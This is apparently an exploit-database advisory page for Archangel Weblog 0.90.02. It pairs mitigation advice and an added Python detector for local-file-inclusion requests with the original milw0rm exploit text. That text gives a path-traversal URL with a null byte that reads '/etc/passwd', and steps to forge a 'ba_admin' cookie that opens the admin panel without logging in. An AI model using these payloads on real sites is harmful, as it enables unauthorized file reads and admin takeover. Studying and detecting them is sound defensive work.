Vendor: Archangel Weblog
Author: Dj7xpl
CVSS: 7.5 (HIGH)
Local File Inclusion & Login Page Bypass By Cookie
Product Name: Archangel Weblog
Affected Version From: 0.90.02
Affected Version To: 0.90.02
Patch Exists: NO
2007

Archangel Weblog version 0.90.02 Local File Inclusion & Login Page Bypass By Cookie

Archangel Weblog version 0.90.02 is vulnerable to Local File Inclusion and to a Login Page Bypass via a forged cookie. An attacker can exploit the first issue by sending a specially crafted request to index.php whose `index` parameter names a local file, causing that file to be included, and the second by setting the `ba_admin` cookie to an administrator's user id, which lets the Admin panel be reached without logging in. Either can lead to unauthorized access to sensitive information or to administrative privileges.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to a patched version of the Archangel Weblog software (none is listed in this record). Additionally, access controls should be implemented to restrict unauthorized access to sensitive files and the login page: the `index` parameter should be restricted to a fixed set of page names rather than used as a file path, and administrative access should be tied to a server-side authenticated session rather than to a client-supplied cookie.
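As an added detection example (not part of the advisory or the product), the following Python scans web-server access-log lines for the index.php `index` parameter pattern described above, decoding repeatedly so that double-encoded null bytes and traversal sequences are still caught; the cookie-based bypass leaves no trace in a standard access log, so it is not covered here. The log lines are constructed for the example.

```python
"""Flag requests matching the index.php inclusion pattern in this advisory (added detection example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Matches the request part of a common/combined access-log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (not from the advisory); lines 2 and 3 mimic the published pattern.
SAMPLE_LOG = """\
192.0.2.10 - - [05/May/2007:12:00:01 +0000] "GET /blog/index.php?index=home HTTP/1.1" 200 5120
192.0.2.11 - - [05/May/2007:12:00:02 +0000] "GET /blog/index.php?index=../../../../etc/passwd%00 HTTP/1.1" 200 1843
192.0.2.12 - - [05/May/2007:12:00:03 +0000] "GET /blog/index.php?index=..%2F..%2Fconfig.php%2500 HTTP/1.1" 200 200
192.0.2.13 - - [05/May/2007:12:00:04 +0000] "GET /blog/index.php?index=/etc/hosts HTTP/1.1" 200 300
"""

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so a double-encoded %2500 is seen as a NUL byte."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_index_param(target: str):
    """Return a reason if the index= value of an index.php request looks like file inclusion, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.php"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("index", []):
        value = fully_decode(raw)
        if "\x00" in value:
            return "null byte in index parameter"
        if ".." in value.replace("\\", "/").split("/"):
            return "path traversal in index parameter"
        if value.startswith("/") or re.match(r"^[A-Za-z]:[\\/]", value):
            return "absolute path in index parameter"
    return None

def scan_log(text: str):
    """Return (line_number, client_ip, reason) for every suspicious request in the log text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        reason = m and check_index_param(m.group("target"))
        if reason:
            findings.append((lineno, line.split(" ", 1)[0], reason))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports lines 2 through 4 and leaves the ordinary `index=home` request alone.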

Exploit-DB raw data:

                      \\\|///
                    \\  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
              Home     :  http://www.archangelmgt.com/weblog.shtml
              Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
              Author   :  Dj7xpl / Dj7xpl@2600.ir
              HomePage :  http://Dj7xpl.2600.ir
              Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]